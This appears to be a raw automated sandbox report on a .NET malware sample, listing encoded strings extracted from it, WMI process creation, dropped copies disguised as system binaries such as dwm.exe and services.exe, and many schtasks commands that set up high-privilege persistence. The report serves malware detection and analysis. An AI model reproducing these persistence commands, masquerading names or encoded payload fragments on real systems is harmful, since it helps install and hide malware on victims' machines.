'H4sIAAAAAAAEAA3OUQtDQBwA8K/y153LFroyajkiFk+KotkDV2dz9yCakgf57NvvE/yCoPyoWAcPkkZpCtpOr9elsbJDbwGZWA5N8UU+Npa83GpbXMZMnNJmriDhXpJQe/hsm1NBqzxSsw79aMAKyVWDw4rMqdoh47wg7bM5I1WkL6+jzEQ2mztH3FweOgbB1EixvPfMi/OByul/4RhQ//4B4kpVrJwAAAA='
Source: Mt6QkZnVbc.exe, kJk.cs	Base64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
Source: Mt6QkZnVbc.exe, Ba5.cs	Base64 encoded string: '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

Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\59a07570a8a8386aa1a299e6ab573f686e7e8154

Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: unknown	Process created: C:\Users\user\Desktop\Mt6QkZnVbc.exe "C:\Users\user\Desktop\Mt6QkZnVbc.exe"
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Recovery\services.exe'" /f
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Recovery\services.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Recovery\services.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "BxpXDwLzzgPDKkwHFtsUbGgAjnB" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe'" /f
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "BxpXDwLzzgPDKkwHFtsUbGgAjn" /sc ONLOGON /tr "'C:\Program Files (x86)\windows mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "BxpXDwLzzgPDKkwHFtsUbGgAjnB" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Recovery\dwm.exe'" /f
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\dwm.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Recovery\dwm.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe "C:\Program Files (x86)\windows mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe"
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "BxpXDwLzzgPDKkwHFtsUbGgAjnB" /sc MINUTE /mo 10 /tr "'C:\Windows\SKB\LanguageModels\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe'" /f
Source: unknown	Process created: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe "C:\Program Files (x86)\windows mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe"
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "BxpXDwLzzgPDKkwHFtsUbGgAjn" /sc ONLOGON /tr "'C:\Windows\SKB\LanguageModels\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "BxpXDwLzzgPDKkwHFtsUbGgAjnB" /sc MINUTE /mo 6 /tr "'C:\Windows\SKB\LanguageModels\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Recovery\dwm.exe C:\Recovery\dwm.exe
Source: unknown	Process created: C:\Recovery\dwm.exe C:\Recovery\dwm.exe
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "BxpXDwLzzgPDKkwHFtsUbGgAjnB" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Portable Devices\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe'" /f
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "BxpXDwLzzgPDKkwHFtsUbGgAjn" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Recovery\services.exe C:\Recovery\services.exe
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "BxpXDwLzzgPDKkwHFtsUbGgAjnB" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Portable Devices\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Recovery\services.exe C:\Recovery\services.exe
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UserOOBEBrokerU" /sc MINUTE /mo 12 /tr "'C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe'" /f
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UserOOBEBroker" /sc ONLOGON /tr "'C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UserOOBEBrokerU" /sc MINUTE /mo 14 /tr "'C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "BxpXDwLzzgPDKkwHFtsUbGgAjnB" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe'" /f
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "BxpXDwLzzgPDKkwHFtsUbGgAjn" /sc ONLOGON /tr "'C:\Program Files (x86)\google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "BxpXDwLzzgPDKkwHFtsUbGgAjnB" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 5 /tr "'C:\Recovery\sihost.exe'" /f
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Recovery\sihost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 5 /tr "'C:\Recovery\sihost.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Recovery\sihost.exe C:\Recovery\sihost.exe
Source: unknown	Process created: C:\Recovery\sihost.exe C:\Recovery\sihost.exe
Source: unknown	Process created: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe
Source: unknown	Process created: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process created: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe "C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe"
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process created: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe "C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe"	Jump to behavior

Source: Mt6QkZnVbc.exe, 78v.cs	.Net Code: _9jF
Source: Mt6QkZnVbc.exe, Ba5.cs	.Net Code: _1G1 System.AppDomain.Load(byte[])
Source: Mt6QkZnVbc.exe, Ba5.cs	.Net Code: _1G1 System.Reflection.Assembly.Load(byte[])
Source: Mt6QkZnVbc.exe, Ba5.cs	.Net Code: _1G1

Source: dwm.exe.0.dr	Static PE information: real checksum: 0x13d0fa should be: 0x142058
Source: services.exe.0.dr	Static PE information: real checksum: 0x13d0fa should be: 0x142058
Source: BxpXDwLzzgPDKkwHFtsUbGgAjn.exe.0.dr	Static PE information: real checksum: 0x13d0fa should be: 0x142058
Source: UserOOBEBroker.exe.0.dr	Static PE information: real checksum: 0x13d0fa should be: 0x142058
Source: Mt6QkZnVbc.exe	Static PE information: real checksum: 0x13d0fa should be: 0x142058
Source: BxpXDwLzzgPDKkwHFtsUbGgAjn.exe0.0.dr	Static PE information: real checksum: 0x13d0fa should be: 0x142058

Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Recovery\dwm.exe			Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Recovery\services.exe			Jump to dropped file

Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Recovery\RCX6C11.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Recovery\dwm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Recovery\RCX786B.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Program Files (x86)\Windows Mail\RCX69BF.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Program Files\Windows Portable Devices\RCX7115.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Recovery\RCX67AA.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Windows\SKB\LanguageModels\RCX6E93.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Program Files (x86)\Google\RCX75E9.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Program Files (x86)\Google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Program Files (x86)\google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Program Files\Windows Portable Devices\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Program Files (x86)\windows mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Users\user\Desktop\RCX6567.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Users\user\Desktop\Mt6QkZnVbc.exe (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Windows\SKB\LanguageModels\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Recovery\sihost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Windows\ServiceProfiles\LocalService\Desktop\RCX73C5.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Recovery\services.exe	Jump to dropped file

Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Memory allocated: 1820000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Memory allocated: 1B2D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Memory allocated: 17A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Memory allocated: 1B400000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Memory allocated: A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Memory allocated: 1A510000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\dwm.exe	Memory allocated: 1520000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\dwm.exe	Memory allocated: 1B330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\dwm.exe	Memory allocated: E00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\dwm.exe	Memory allocated: 1A9B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\services.exe	Memory allocated: BB0000 memory reserve \| memory write watch
Source: C:\Recovery\services.exe	Memory allocated: 1AAA0000 memory reserve \| memory write watch
Source: C:\Recovery\services.exe	Memory allocated: 29B0000 memory reserve \| memory write watch
Source: C:\Recovery\services.exe	Memory allocated: 1A9B0000 memory reserve \| memory write watch
Source: C:\Recovery\sihost.exe	Memory allocated: 770000 memory reserve \| memory write watch
Source: C:\Recovery\sihost.exe	Memory allocated: 1A320000 memory reserve \| memory write watch
Source: C:\Recovery\sihost.exe	Memory allocated: 2420000 memory reserve \| memory write watch
Source: C:\Recovery\sihost.exe	Memory allocated: 1A5A0000 memory reserve \| memory write watch
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	Memory allocated: 1600000 memory reserve \| memory write watch
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	Memory allocated: 1B080000 memory reserve \| memory write watch
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	Memory allocated: EC0000 memory reserve \| memory write watch
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	Memory allocated: 1ABD0000 memory reserve \| memory write watch
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	Memory allocated: 2380000 memory reserve \| memory write watch
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	Memory allocated: 1A500000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\dwm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\dwm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\services.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\services.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\sihost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\sihost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Window / User API: threadDelayed 1505	Jump to behavior
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Window / User API: threadDelayed 689	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Window / User API: threadDelayed 368	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Window / User API: threadDelayed 485	Jump to behavior
Source: C:\Recovery\dwm.exe	Window / User API: threadDelayed 369	Jump to behavior
Source: C:\Recovery\dwm.exe	Window / User API: threadDelayed 367	Jump to behavior
Source: C:\Recovery\services.exe	Window / User API: threadDelayed 374
Source: C:\Recovery\services.exe	Window / User API: threadDelayed 365
Source: C:\Recovery\sihost.exe	Window / User API: threadDelayed 462
Source: C:\Recovery\sihost.exe	Window / User API: threadDelayed 365
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	Window / User API: threadDelayed 367
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	Window / User API: threadDelayed 464
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	Window / User API: threadDelayed 476

Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Dropped PE file which has not been started: C:\Recovery\RCX6C11.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Dropped PE file which has not been started: C:\Recovery\RCX786B.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Windows Mail\RCX69BF.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Dropped PE file which has not been started: C:\Program Files\Windows Portable Devices\RCX7115.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Dropped PE file which has not been started: C:\Recovery\RCX67AA.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Dropped PE file which has not been started: C:\Windows\SKB\LanguageModels\RCX6E93.tmp	Jump to dropped file
